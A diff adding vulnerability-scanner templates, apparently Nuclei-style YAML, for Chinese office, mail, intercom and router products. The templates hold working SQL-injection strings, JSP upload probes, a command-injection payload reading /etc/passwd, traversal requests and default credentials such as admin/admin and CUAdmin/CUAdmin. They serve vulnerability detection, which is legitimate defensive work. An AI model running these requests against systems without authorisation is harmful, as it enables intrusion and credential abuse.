application/octet-stream + + <% + out.println(new String("{{verify}}"))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="submit" + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="continueUpload" + + 1 + --ffb3cc4faa19bf85108f166d3069705f-- + - | + GET /defaultroot/upload/information/{{tmpFIle}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + varName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-064324.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-064324.yaml" new file mode 100755 index 000000000..25e70229b --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-064324.yaml" @@ -0,0 +1,39 @@ +id: wooyun-2014-064324 +info: + name: 万户ezOffice GraphReportAction.do SQL注入漏洞 + author: + - 折跃 + description: | + 万户ezOFFICE GraphReportAction.do SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'~~~ab') + path: + - '{{BaseURL}}/defaultroot/GraphReportAction.do?action=showResult' + method: POST + body: dataSQL=select chr(126)||chr(126)||chr(126)||chr(97)||chr(98) from dual + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-067391.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-067391.yaml" new file mode 100755 index 000000000..4c3efccb5 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-067391.yaml" @@ -0,0 +1,65 @@ +id: wooyun-2014-067391 +info: + name: 万户ezOffice协同办公管理平台 informationmanager_upload.jsp 文件上传漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE informationmanager_upload.do 任意文件上传漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_1,varName) + - contains(body_2,verify) + extractors: + - name: tmpFIle + type: regex + regex: + - opener.document.all.null.value = "(.+?)"; + group: 1 + part: body + internal: true + raw: + - | + POST /defaultroot/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=ffb3cc4faa19bf85108f166d3069705f + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="file1"; filename="{{varName}}.jsp" + Content-Type: Content-Type: application/octet-stream + + <% + out.println(new String("{{verify}}"))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --ffb3cc4faa19bf85108f166d3069705f-- + - | + GET /defaultroot/upload/information/{{tmpFIle}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + varName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-075657.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-075657.yaml" new file mode 100755 index 000000000..5ca9a60c7 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-075657.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2014-075657 +info: + name: 万户ezOffice InfoTemplateEdit.jsp SQL注入漏洞 + author: + - 折跃 + description: | + 万户ezOFFICE InfoTemplateEdit.jsp SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'~~~') + path: + - '{{BaseURL}}/defaultroot/iWebOfficeSign/Template/InfoTemplateEdit.jsp?RecordID=1''+UNION+ALL+SELECT+NULL,NULL,char(126)%2bchar(126)%2bchar(126),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-082128.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-082128.yaml" new file mode 100755 index 000000000..e2f8a4977 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2014-082128.yaml" @@ -0,0 +1,65 @@ +id: wooyun-2014-082128 +info: + name: 万户ezOffice协同办公管理平台 multiuploadfile.jsp 文件上传漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE multiuploadfile.jsp 任意文件上传漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_1,varName) + - contains(body_2,verify) + extractors: + - name: tmpFIle + type: regex + regex: + - opener.reView\("(.+?)"\) + group: 1 + part: body + internal: true + raw: + - | + POST /defaultroot/public/jsp/multiuploadfile.jsp?path=sound&mode=add&fileName=fileName&saveName=soundSaveName&tableName=soundTableName&fileMaxSize=0&photos=null HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=ffb3cc4faa19bf85108f166d3069705f + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="file1"; filename="{{varName}}.jsp" + Content-Type: Content-Type: application/octet-stream + + <% + out.println(new String("{{verify}}"))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --ffb3cc4faa19bf85108f166d3069705f-- + - | + GET /defaultroot/upload/information/{{tmpFIle}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + varName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0108823.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0108823.yaml" new file mode 100755 index 000000000..8fce8f268 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0108823.yaml" @@ -0,0 +1,72 @@ +id: wooyun-2015-0108823 +info: + name: 万户ezOffice协同办公管理平台 smartUpload.jsp 文件上传漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE smartUpload.jsp 任意文件上传漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在任意文件上传漏洞。远程攻击者可以利用该漏洞上传文件并执行代码。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、及时修复Web上传代码。 + 10、不能有本地文件包含漏洞。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_1,varName) + - contains(body_2,verify) + extractors: + - name: tmpFIle + type: regex + regex: + - download.jsp\?FileName=(.+?)\&name= + group: 1 + part: body + internal: true + raw: + - | + POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=ffb3cc4faa19bf85108f166d3069705f + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="file1"; filename="{{varName}}.jsp" + Content-Type: Content-Type: application/octet-stream + + <% + out.println(new String("{{verify}}"))); + new java.io.File(application.getRealPath(request.getServletPath())).delete(); + %> + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="submit" + + --ffb3cc4faa19bf85108f166d3069705f-- + Content-Disposition: form-data; name="continueUpload" + + 1 + --ffb3cc4faa19bf85108f166d3069705f-- + - | + GET /defaultroot/upload/information/{{tmpFIle}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true +variables: + varName: '{{rand_text_alphanumeric(8,"")}}' + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0116362.yaml" "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0116362.yaml" new file mode 100755 index 000000000..b8737b691 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\207\346\210\267\345\215\217\345\220\214\345\212\236\345\205\254\345\271\263\345\217\260(ezOFFICE)/wooyun-2015-0116362.yaml" @@ -0,0 +1,39 @@ +id: wooyun-2015-0116362 +info: + name: 万户ezOffice jigeObj.jsp SQL注入漏洞 + author: + - 折跃 + description: |- + 万户ezOFFICE jigeObj.jsp SQL注入漏洞 + 万户ezOFFICE协同办公平台是一款OA协同办公软件产品。 + + 万户ezOFFICE存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.whir.net/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'~~~') + path: + - '{{BaseURL}}/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1''+UNION+ALL+SELECT+null,null,null,null,null,null,CHR(126)||CHR(126)||CHR(126)||NVL(CAST(USER + AS VARCHAR(4000)),CHR(32))||CHR(126)||CHR(126)||CHR(126),null,null,null+from+dual--+-' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true diff --git "a/config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/SponIpIntercom-File-Read.yaml" "b/config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/SponIpIntercom-File-Read.yaml" new file mode 100755 index 000000000..8902cc1a3 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/SponIpIntercom-File-Read.yaml" @@ -0,0 +1,62 @@ +id: SponIpIntercom-File-Read +info: + name: SponIpIntercom-File-Read + author: + - l0ne1y + description: |- + 世邦IP网络广播系统任意文件读取漏洞 + 传入downname参数,没有对 ../ 符号过滤,就导致跳目录读取文件 + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: + https://www.spon.com.cn/sfhy/106.html + + 临时修复建议: + + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - require_once ('conversion.php'); + - $json_string = file_get_contents($fullpath); + path: + - '{{BaseURL}}/php/rj_get_token.php' + method: POST + body: jsondata[url]=../php/getjson.php + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +- matchers: + - type: word + condition: and + part: body + words: + - require_once ('conversion.php'); + - $json_string = file_get_contents($fullpath); + path: + - '{{BaseURL}}/php/exportrecord.php?downname=../php/getjson.php' + method: POST + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +- matchers: + - type: word + condition: and + part: body + words: + - require_once ('conversion.php'); + - $json_string = file_get_contents($fullpath); + path: + - '{{BaseURL}}/php/getjson.php' + method: POST + body: jsondata[filename]=../php/getjson.php + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +variables: + veritify: '{{rand_int(200000000, 210000000)}}' diff --git "a/config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/spon-ip-intercom-ping-rce.yaml" "b/config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/spon-ip-intercom-ping-rce.yaml" new file mode 100755 index 000000000..662f81a88 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\226\351\202\246IP\347\275\221\347\273\234\345\271\277\346\222\255\347\263\273\347\273\237/spon-ip-intercom-ping-rce.yaml" @@ -0,0 +1,42 @@ +id: spon-ip-intercom-ping-rce +info: + name: spon-ip-intercom-ping-rce + author: + - l0ne1y + description: |- + 世邦IP网络广播系统远程命令执行漏洞 + jsondata数组中的 ip参数,用户可控造成命令拼接,而且通过 exec 执行,并且会 return到页面中,导致回显的RCE + severity: high + remediation: |- + 官方修复建议: + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: + https://www.spon.com.cn/sfhy/106.html + + 临时修复建议: + + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '{{randstr}}' + - type: regex + part: body + negative: true + regex: + - echo.*?{{randstr}} + matchers-condition: and + path: + - '{{BaseURL}}/php/ping.php' + method: POST + body: jsondata[ip]=%7C echo {{randstr}}&jsondata[type]=0 + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 diff --git "a/config/51pwn/yaml/\344\270\255\345\233\275\347\224\265\344\277\241\347\275\221\345\205\263\351\205\215\347\275\256\347\256\241\347\220\206\347\263\273\347\273\237/telecom-gateway-default-login.yaml" "b/config/51pwn/yaml/\344\270\255\345\233\275\347\224\265\344\277\241\347\275\221\345\205\263\351\205\215\347\275\256\347\256\241\347\220\206\347\263\273\347\273\237/telecom-gateway-default-login.yaml" new file mode 100755 index 000000000..41d90f172 --- /dev/null +++ "b/config/51pwn/yaml/\344\270\255\345\233\275\347\224\265\344\277\241\347\275\221\345\205\263\351\205\215\347\275\256\347\256\241\347\220\206\347\263\273\347\273\237/telecom-gateway-default-login.yaml" @@ -0,0 +1,39 @@ +id: telecom-gateway-default-login +info: + name: Telecom Gateway Default Login + author: + - l0ne1y + description: |- + 电信网关配置管理系统弱口令 + 电信网关配置管理系统存在默认弱口令,导致攻击者可利用admin/admin用户密码进入后台,进而对系统以及数据安全造成威胁。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - 电信网关服务器管理后台 + - index-shang.php + - di.php + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name={{username}}&Pass={{password}} + attack: pitchfork + payloads: + password: + - admin + username: + - admin + max-redirects: 2 + redirects: true diff --git "a/config/51pwn/yaml/\344\272\277\351\202\256\347\224\265\345\255\220\351\202\256\344\273\266\347\263\273\347\273\237/CNVD-2021-26422.yaml" "b/config/51pwn/yaml/\344\272\277\351\202\256\347\224\265\345\255\220\351\202\256\344\273\266\347\263\273\347\273\237/CNVD-2021-26422.yaml" new file mode 100755 index 000000000..1f2f19c20 --- /dev/null +++ "b/config/51pwn/yaml/\344\272\277\351\202\256\347\224\265\345\255\220\351\202\256\344\273\266\347\263\273\347\273\237/CNVD-2021-26422.yaml" @@ -0,0 +1,32 @@ +id: CNVD-2021-26422 +info: + name: eYouMail - Remote Code Execution + author: + - l0ne1y + description: | + 亿邮电子邮件系统远程命令执行漏洞 + + 北京亿中邮信息技术有限公司(亿邮)是一款专业的邮件系统软件及整体解决方案提供商。 + + 亿邮电子邮件系统远程命令执行漏洞,攻击者利用该漏洞可在未授权的情况实现远程命令执行,获取目标服务器权限。 + severity: critical + remediation: "官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。\nhttp://www.eyou.net/ \n\n临时修复方案:
1、尽量不去执行外部的应用程序或命令。
2、使用自定义函数或函数库实现外部应用程序或命令的功能。
3、在执行system、eval等命令执行功能的函数前,校验参数内容。
4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\\\’”,双引号“””会被转义为“\\\\””,分号“;”会被转义为“\\\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。'" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' diff --git "a/config/51pwn/yaml/\345\205\211\347\214\253/Chinaunicom-Default-Login.yaml" "b/config/51pwn/yaml/\345\205\211\347\214\253/Chinaunicom-Default-Login.yaml" new file mode 100755 index 000000000..a222a7508 --- /dev/null +++ "b/config/51pwn/yaml/\345\205\211\347\214\253/Chinaunicom-Default-Login.yaml" @@ -0,0 +1,36 @@ +id: Chinaunicom-Default-Login +info: + name: 中国联通光猫默认口令 + author: + - l0ne1y + description: |- + 中国联通光猫默认口令 + 中国联通光猫存在默认凭证CUAdmin/CUAdmin。使用该凭证容易被攻击者轻易进入后台,造成敏感信息泄漏。 + severity: high + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + #### 临时修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。
2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。
3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。
4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)
5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: status + status: + - 302 + - type: word + part: header + words: + - /menu.gch + matchers-condition: and + raw: + - | + POST /cu.html HTTP/1.1 + Host: {{Hostname}} + + frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= + attack: pitchfork + payloads: + password: + - CUAdmin + username: + - CUAdmin diff --git "a/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-HG532e-default-login.yaml" "b/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-HG532e-default-login.yaml" new file mode 100755 index 000000000..f2400f599 --- /dev/null +++ "b/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-HG532e-default-login.yaml" @@ -0,0 +1,39 @@ +id: huawei-HG532e-default-login +info: + name: Huawei HG532e Default Credential + author: + - l0ne1y + description: |- + 华为HG532e默认账号密码 + Huawei HG532e是中国华为(Huawei)公司的一款无线路由器产品。 + Huawei HG532e其web管理后台存在默认账户 + severity: high + remediation: |- + 1、配置所有的安全机制 + 2、最小原则,关掉或限制不使用的服务 + 3、更改默认账户信息 + 4、使用日志和警报 + 5、回显信息不显示任何与实际错误相关的信息 + 6、检查和修复安全配置项 +requests: +- matchers: + - type: word + part: header + words: + - 'Set-Cookie: SessionID' + - type: word + part: body + words: + - replace + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /index/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0 + Content-Type: application/x-www-form-urlencoded + + Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D diff --git "a/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg255s-lfi.yaml" "b/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg255s-lfi.yaml" new file mode 100755 index 000000000..56d218311 --- /dev/null +++ "b/config/51pwn/yaml/\345\215\216\344\270\272\350\267\257\347\224\261\345\231\250/huawei-hg255s-lfi.yaml" @@ -0,0 +1,28 @@ +id: huawei-hg255s-lfi +info: + name: Huawei HG255s - Directory Traversal + author: + - l0ne1y + description: |- + 华为HG255s产品目录遍历 + Huawei HG255s-10是中国华为(Huawei)公司的一款无线路由器产品。 + + Huawei HG255s-10 V100R001C163B025SP02版本中存在路径遍历漏洞,该漏洞源于程序未能充分的验证接收到的HTTP请求。远程攻击者可利用该漏洞在未经身份验证的情况下访问设备上的本地文件。 + severity: medium + remediation: 